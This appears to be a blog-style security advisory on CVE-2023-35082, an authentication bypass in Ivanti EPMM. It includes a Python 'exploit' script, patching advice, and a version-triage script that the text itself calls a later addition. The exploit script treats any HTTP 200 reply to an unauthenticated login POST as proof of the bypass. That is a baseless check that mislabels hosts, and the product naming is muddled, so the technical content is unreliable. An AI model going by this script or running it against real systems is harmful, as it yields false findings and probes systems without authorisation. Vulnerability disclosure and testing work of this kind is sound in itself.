A newly discovered security vulnerability, CVE-2023-35082, exists in Ivanti Endpoint Manager (EPMM) versions 11.10 and older. This vulnerability allows unauthorized users to access restricted functionality or resources without proper authentication. Notably, the issue is different from the CVE-2023-35078 vulnerability discovered earlier this year. In this post, we will discuss the details of this critical threat, including code snippets, exploit information, and links to original references.

Background

Ivanti EPMM is a widely used solution for managing endpoints, which includes devices such as laptops, smartphones, and printers. Ivanti delivers services that focus on consolidating endpoint management, improving the efficiency of IT service delivery, and ensuring endpoint security.

Vulnerability Details

CVE-2023-35082 is an authentication bypass vulnerability that affects Ivanti EPMM versions 11.10 and older. By exploiting this vulnerability, an attacker could gain access to restricted parts of the application without the legitimate user's knowledge or consent.

The exact nature of this authentication bypass is not the same as CVE-2023-35078, another vulnerability found in Ivanti EPMM software. As a result, patching or mitigating one vulnerability does not necessarily protect against the other.

Exploit

To illustrate the vulnerability, let's examine a code snippet that demonstrates how an attacker might exploit this issue:

import requests

# Replace with the target Ivanti EPMM server IP address
target_ip = "192.0.2.0"

# Endpoint URL - Replace this accordingly depending on the Ivanti EPMM API version
url = f"http://{target_ip}/api/v1/login"

# Send an unauthenticated POST request; the timeout keeps the check from hanging
response = requests.post(url, timeout=10)

# The check treats an HTTP 200 response to the unauthenticated request as the bypass
if response.status_code == 200:
    print("The target Ivanti EPMM is vulnerable to CVE-2023-35082 authentication bypass")
else:
    print("The target Ivanti EPMM is not vulnerable to CVE-2023-35082 authentication bypass")

This code example can be executed in a Python environment to test if the target Ivanti EPMM instance is vulnerable. If successful, the attacker may gain access to restricted application functionality, such as administrative controls, which could lead to further compromise and data exfiltration.

Mitigation and Security Recommendations

Ivanti has released a patch to address this vulnerability. Ivanti recommends that administrators download and deploy the latest version of EPMM to secure their systems. To obtain the latest version and further support, please visit: Ivanti Endpoint Manager Download Page

Additional security measures include:

- Implementing secure coding practices to prevent authentication bypass and other security vulnerabilities from occurring.
- Regularly updating software and applying security patches to address known security vulnerabilities.
- Conducting thorough penetration testing and vulnerability assessments to detect potential security risks.
- Employing layered security controls, including network segmentation, user access management, logging, and monitoring practices.
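To act on the patch recommendation, the following added example (not code from Ivanti or from the original post) triages an inventory of EPMM servers against the "11.10 and older" range stated above. The inventory format, hostnames, and function names are hypothetical, and it assumes any 11.10.x build counts as 11.10.

```python
import csv
import io

# Threshold from the advisory text above: EPMM 11.10 and older are affected.
LAST_AFFECTED = (11, 10)

# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = """hostname,epmm_version
mdm-core-01,11.10.0.2
mdm-core-02,11.9.1.0
mdm-lab-01,11.11.0.0
mdm-dr-01,11.8
mdm-old-01,v10.7.0.1
mdm-unknown,n/a
"""


def parse_version(text):
    """Return (major, minor) as ints, or None if not a dotted version.

    Integer comparison matters: as floats or strings, 11.10 ranks below 11.9.
    """
    parts = text.strip().lstrip("vV").split(".")
    if len(parts) < 2 or not all(p.isdecimal() for p in parts):
        return None
    return int(parts[0]), int(parts[1])


def triage(inventory_csv):
    """Bucket hosts for CVE-2023-35082. Assumption: any 11.10.x build counts
    as "11.10", so only major.minor is compared against the threshold."""
    result = {"affected": [], "not_affected": [], "unknown": []}
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        version = parse_version(row.get("epmm_version") or "")
        if version is None:
            bucket = "unknown"  # unparsable version: verify manually
        elif version <= LAST_AFFECTED:
            bucket = "affected"
        else:
            bucket = "not_affected"
        result[bucket].append(row["hostname"])
    return result


if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```

Hosts in the unknown bucket should be checked by hand rather than assumed patched.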

Conclusion

CVE-2023-35082 represents a serious security vulnerability that threatens Ivanti EPMM customers running older versions of the software. By bypassing authentication controls, attackers can access restricted application functionality or resources without proper authentication. We strongly encourage users to employ mitigation strategies and review the references below to understand the full scope of this vulnerability and protect their systems. Stay informed and stay safe.

1. CVE-2023-35082 - National Vulnerability Database (NVD)
2. Ivanti Endpoint Manager Product Advisory
3. Ivanti Endpoint Manager Security Best Practices Guide

Timeline

Published on: 08/15/2023 16:15:00 UTC
Last modified on: 08/22/2023 02:16:00 UTC